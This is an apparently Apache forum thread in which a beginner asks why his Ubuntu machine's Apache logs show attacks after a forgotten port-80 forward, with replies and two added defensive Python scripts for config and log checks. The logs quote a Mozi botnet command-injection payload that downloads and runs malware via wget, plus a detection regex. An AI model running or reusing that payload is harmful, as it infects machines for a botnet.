Topic: unwarranted apache2 processes

untalented

Joined: 20 Apr 2021
Posts: 5

Posted: Tue 20 Apr '21 13:33    Post subject: unwarranted apache2 processes

Hello,

For context I am learning programming and not very well versed in how Apache works.
My OS is Ubuntu 20.04.

I installed apache2 several months ago. It was purely to access local projects through localhost on a web browser and learn a few things about PHP; I have never tried to host an externally accessible web server on my machine.

A few days ago I needed to listen on port 80 for a programming project. I realized that I could not because several apache2 processes were already listening on that port. Killing the processes made them restart instantly.
Trying to understand what was happening I stumbled upon the Apache log files in /var/log/apache.

I was baffled to discover more than a dozen access.log files containing what seem to be external connections to an apache2 server on my machine. These come from a variety of IP addresses from all over the world. Some of the requests seem to be scanning for vulnerabilities or even consist of shellcode.
Here are a few samples :

Code:
117.201.202.141 - - [09/Apr/2021:19:09:18 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.201.202.141:54965/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 493 "-" "Hello, world"


Code:
111.7.96.151 - - [06/Apr/2021:10:56:36 +0200] "\x16\x03" 400 0 "-" "-"


Code:
111.7.96.151 - - [06/Apr/2021:10:56:38 +0200] "GET / HTTP/1.1" 200 3440 "-" "Chrome/54.0 (Windows NT 10.0)"


Some of these have a 200 status, meaning they succeeded ?

This does not make any sense to me.
Why were apache2 processes even running ? And how is it possible that my computer was reachable from the outside world ?

Does installing apache2 mean that the OS will automatically launch a server process upon startup, a server that will readily listen on port 80 and accept external connections ?

Or does it look like a malware was starting the apache2 processes and using them ?

I have never run an actual server so I do not know if any of that makes sense.

Needless to say I am extremely worried that my computer has been compromised somehow. I realize my questions must seem stupid but I really need help to understand what has been happening.

Thanks a lot for your help.

James Blond
Moderator

Joined: 19 Jan 2006
Posts: 6935
Location: Germany, Next to Hamburg

Posted: Thu 22 Apr '21 21:26    Post subject: Re: unwarranted apache2 processes

untalented wrote:


I was baffled to discover more than a dozen access.log files containing what seem to be external connections to an apache2 server on my machine. These come from a variety of IP addresses from all over the world. Some of the requests seem to be scanning for vulnerabilities or even consist of shellcode.
Here are a few samples :

Code:
117.201.202.141 - - [09/Apr/2021:19:09:18 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.201.202.141:54965/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 493 "-" "Hello, world"


Code:
111.7.96.151 - - [06/Apr/2021:10:56:36 +0200] "\x16\x03" 400 0 "-" "-"


Code:
111.7.96.151 - - [06/Apr/2021:10:56:38 +0200] "GET / HTTP/1.1" 200 3440 "-" "Chrome/54.0 (Windows NT 10.0)"


Some of these have a 200 status, meaning they succeeded ?

The 200 status means page found. If someone calls /, it is the index page, like http://example.com/

untalented wrote:

Why were apache2 processes even running ?


On Ubuntu apache is installed as a service by default and will be restarted if it is not running. You can disable that behavior with sudo systemcl

untalented wrote:

And how is it possible that my computer was reachable from the outside world ?

Usually it is the router / firewall config / port forwarding.

untalented wrote:

Does installing apache2 mean that the OS will automatically launch a server process upon startup, a server that will readily listen on port 80 and accept external connections ?


Yes, see above.

untalented wrote:

Or does it look like a malware was starting the apache2 processes and using them ?


I guess not, but I can't check the installation.

untalented wrote:

Needless to say I am extremely worried that my computer has been compromised somehow. I realize my questions must seem stupid but I really need help to understand what has been happening.


Most of those attacks that you see in your logs are harmless as long as you don't have software running on that server which the attacker can attack.

untalented

Joined: 20 Apr 2021
Posts: 5

Posted: Sat 24 Apr '21 17:03

Thanks a lot for your answers, they helped me a lot.

I discovered that I had indeed forwarded the port 80 in my router. I had done it to fix an application a long time ago and had forgotten about it; I guess that explains how my computer was reachable from the outside.

If you don't mind, I have a few more questions :

    - do bots typically try out random IP addresses, or is it likely that they harvested mine somehow ?

    - most of the requests with a 200 status code were indeed asking for the root. Does the root correspond to what was in /var/www/html ?

    - what to make of a request like this ? What is it doing ?
    Code:
    180.95.231.6 - - [05/Apr/2021:18:47:19 +0200] "GET http://www.epochtimes.com/ HTTP/1.1" 200 3477 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"


    - isn't it common to install apache purely to test websites, with no intent of being reachable from the exterior ? Are there common steps to take to avoid this kind of problem ?



Thanks again.

James Blond
Moderator

Joined: 19 Jan 2006
Posts: 6935
Location: Germany, Next to Hamburg

Posted: Sun 25 Apr '21 19:34

untalented wrote:

do bots typically try out random IP addresses, or is it likely that they harvested mine somehow ?


Bots do randomly test all IP addresses for running services and try to attack them. I don't think that they got you.

untalented wrote:

most of the requests with a 200 status code were indeed asking for the root. Does the root correspond to what was in /var/www/html ?


Yes to that, whatever you defined as DirectoryIndex. Most likely index.html or index.php

That is the reason you have a default empty vhost with a blank index file in it and all the other stuff in name based vhosts.

untalented wrote:

what to make of a request like this ? What is it doing ?
Code:
180.95.231.6 - - [05/Apr/2021:18:47:19 +0200] "GET http://www.epochtimes.com/ HTTP/1.1" 200 3477 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"



The question mark is a separator in the URL between the URL and the so-called query string.[1] Basically URL GET parameters.

untalented wrote:

isn't it common to install apache purely to test websites, with no intent of being reachable from the exterior ? Are there common steps to take to avoid this kind of problem ?


Most administrators install apache as a reachable web server from the internet. So the default behavior is correct.
To avoid this use a firewall / router.


If you still have a question please ask again.


[1] https://en.wikipedia.org/wiki/Query_string
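
Added example, not part of any post in this thread: besides the firewall / router, Apache itself can be limited to the loopback interface through its `Listen` directive, which suits a machine used only for local testing. The Python check below reports every `Listen` line that binds a non-loopback address; the function name and both sample configurations are constructed (on Ubuntu the directive normally lives in /etc/apache2/ports.conf).

```python
import ipaddress
import re

# Listen [IP-address:]portnumber [protocol]; IPv6 addresses go in brackets
LISTEN_RE = re.compile(
    r'^\s*Listen\s+(?:(?P<addr>\[[^\]]+\]|\*|[0-9.]+):)?(?P<port>\d+)(?:\s+\S+)?\s*$',
    re.I,
)


def audit_listen(config_text):
    """Return (lineno, address, port, exposed) for each Listen directive."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        m = LISTEN_RE.match(line)  # commented-out lines start with '#': no match
        if not m:
            continue
        addr = (m["addr"] or "*").strip("[]")
        try:
            # "*" or a missing address means every interface
            exposed = addr == "*" or not ipaddress.ip_address(addr).is_loopback
        except ValueError:
            exposed = True  # unparseable address: report it rather than hide it
        findings.append((lineno, addr, int(m["port"]), exposed))
    return findings


# Constructed sample: stock-style configuration that binds all interfaces
DEFAULT_PORTS_CONF = """\
# ports.conf (constructed sample)
Listen 80
<IfModule ssl_module>
    Listen 443
</IfModule>
"""

# Constructed sample: local-testing configuration bound to loopback only
LOCAL_ONLY_CONF = """\
Listen 127.0.0.1:80
Listen [::1]:80
"""

if __name__ == "__main__":
    for name, conf in (("default", DEFAULT_PORTS_CONF), ("local", LOCAL_ONLY_CONF)):
        for lineno, addr, port, exposed in audit_listen(conf):
            print(f"{name}: line {lineno}: {addr}:{port} "
                  f"{'REACHABLE from other hosts' if exposed else 'loopback only'}")
```

A LAN address such as 192.168.x.x is reported as exposed too, since that is the address a router's port forwarding rule points at.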

untalented

Joined: 20 Apr 2021
Posts: 5

Posted: Mon 26 Apr '21 10:17

Thanks again for your help.

James Blond wrote:

The question mark is a separator in the URL between the URL and the so-called query string.[1] Basically URL GET parameters.


I know about URL format, but I'm not sure what you mean as there is no question mark in the request.
Perhaps I was not clear : this was a request sent to my computer when apache2 was running. There were several with a similar format, for example :

Code:
171.37.39.31 - - [13/Apr/2021:21:09:25 +0200] "GET http://dongtaiwang.com/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"


What I'm not understanding is what these requests are doing. In the request line, the resource asked for is the URL of a website, for instance http://www.epochtimes.com/.
Obviously this is not a local resource present on my computer, but the request has a 200 status code. So what is it doing ? Is it asking for my computer to retrieve an external webpage ? This seems extremely dangerous from a security standpoint so I find it hard to believe that such requests would be allowed by default. This is why I'm puzzled.

Thanks

James Blond
Moderator

Joined: 19 Jan 2006
Posts: 6935
Location: Germany, Next to Hamburg

Posted: Mon 26 Apr '21 12:13

I'm not sure either what that request shall do.

Code:

curl -i -H "GET http://www.epochtimes.com/ HTTP/1.1" -H "Host: www.example.com" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" -H "Accept-Language: de-DE,en-US;q=0.7,en;q=0.3" http://www.example.com


That gives me a 200 status code, too, but the HTML I get is from the www.example.com page.

On my own server I get a 400 error, because of the security headers.

Code:

X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Expect-CT: max-age=86400, enforce
Feature-Policy: geolocation 'none'; midi 'none'; camera 'none'; usb 'none'; magnetometer 'none'; accelerometer 'none'; vr 'none'; speaker 'none'; ambient-light-sensor 'none'; gyroscope 'none'; microphone 'none'
Content-Security-Policy:        default-src 'self' 'unsafe-inline' data:;       font-src 'self' 'unsafe-inline' fonts.gstatic.com data:;        style-src 'self' 'unsafe-inline' fonts.googleapis.com;          script-src 'self' 'unsafe-inline' 'unsafe-eval';
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>

tangent

Joined: 16 Aug 2020
Posts: 83
Location: UK

Posted: Mon 26 Apr '21 20:58

Further to James' reply, I would suggest your unwanted HTTP requests (such as http://dongtaiwang.com) are Host Header Injection (HHI) attacks, where the miscreant has simply supplied a false host header value.

By default most web servers, including Apache, will pass unknown host header requests to the first virtual host in the configuration, and depending on what scripted content your site serves, it's possible (amongst other things) to redirect the client browser to the attacker's site. There are plenty of details and examples out on the net about HHI attacks.

Your real problem though isn't the Apache defaults, which are designed to get you up and running as quickly as possible, but that your router was configured to forward port 80 through to your internal server. Bots are always scanning the net, looking for open service ports to attack.
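
Added example, not part of any post in this thread: a small Python triage script that sorts access.log lines like the ones quoted above by the shape of the request line. It separates TLS handshakes sent to port 80 (`\x16\x03`), command strings in the query, and requests whose target is a full URL (the absolute form a client uses toward a proxy), and lists which of them were answered with a 2xx status. The regular expressions, labels and sample lines (documentation-range addresses) are constructed for illustration.

```python
import re
from collections import Counter

# Start of an Apache "combined" line: host ident user [time] "request" status
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) '
)
# Download/permission tools followed by an encoded space in the request target
CMD_RE = re.compile(r'\b(?:wget|curl|tftp|chmod)(?:\+|%20)', re.I)
# scheme://host/... where an ordinary request carries a path starting with "/"
ABS_URI_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)


def classify(line):
    """Return (host, status, label) for one access.log line."""
    m = LINE_RE.match(line)
    if not m:
        return (None, None, "unparsed")
    request, parts = m["request"], m["request"].split(" ")
    if request.startswith(r"\x16\x03"):
        # Apache logs raw bytes as \xhh; 0x16 0x03 opens a TLS handshake record
        label = "tls-on-plain-http"
    elif len(parts) != 3 or not parts[2].startswith("HTTP/"):
        label = "malformed-request"
    elif CMD_RE.search(parts[1]):
        label = "command-injection-probe"
    elif ABS_URI_RE.match(parts[1]):
        label = "absolute-uri-target"
    else:
        label = "ordinary"
    return (m["host"], int(m["status"]), label)


def triage(lines):
    """Count labels; list suspicious requests that still got a 2xx answer."""
    results = [classify(line) for line in lines]
    counts = Counter(label for _, _, label in results)
    answered = [r for r in results
                if r[2] not in ("ordinary", "unparsed") and 200 <= r[1] < 300]
    return counts, answered


# Constructed sample lines shaped like those in the thread (documentation IPs)
SAMPLE = [
    r'192.0.2.10 - - [09/Apr/2021:19:09:18 +0200] "GET /shell?cd+/tmp;wget+http://192.0.2.10/x;chmod+777+x HTTP/1.1" 404 493 "-" "Hello, world"',
    r'198.51.100.7 - - [06/Apr/2021:10:56:36 +0200] "\x16\x03" 400 0 "-" "-"',
    r'198.51.100.7 - - [06/Apr/2021:10:56:38 +0200] "GET / HTTP/1.1" 200 3440 "-" "Chrome/54.0 (Windows NT 10.0)"',
    r'203.0.113.5 - - [05/Apr/2021:18:47:19 +0200] "GET http://www.example.org/ HTTP/1.1" 200 3477 "-" "Mozilla/5.0"',
]
```

Calling `triage(SAMPLE)` returns the label counts and the flagged requests that received a 2xx; comparing the byte count of such a line with that of a plain `GET /` line shows whether the server simply returned its own index page.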

untalented

Joined: 20 Apr 2021
Posts: 5

Posted: Tue 27 Apr '21 22:15

Thanks for your help.

In my case, what did apache reply to these requests with ? Did it still send the index page ?


Also, does it mean that one can send arbitrary request strings like "GET http://example.com/" and still receive a response if this default behavior is not changed ?

James Blond
Moderator

Joined: 19 Jan 2006
Posts: 6935
Location: Germany, Next to Hamburg

Posted: Tue 27 Apr '21 23:04

untalented wrote:


In my case, what did apache reply to these requests with ? Did it still send the index page ?


Yes, it did.

untalented wrote:

Also, does it mean that one can send arbitrary request strings like "GET http://example.com/" and still receive a response if this default behavior is not changed ?


ModSecurity is an option to prevent such things (a bit tricky to configure) and the security headers that I posted above.

untalented

Joined: 20 Apr 2021
Posts: 5

Posted: Wed 28 Apr '21 21:26

I understand.
Thanks a lot for all the help, it was a real relief.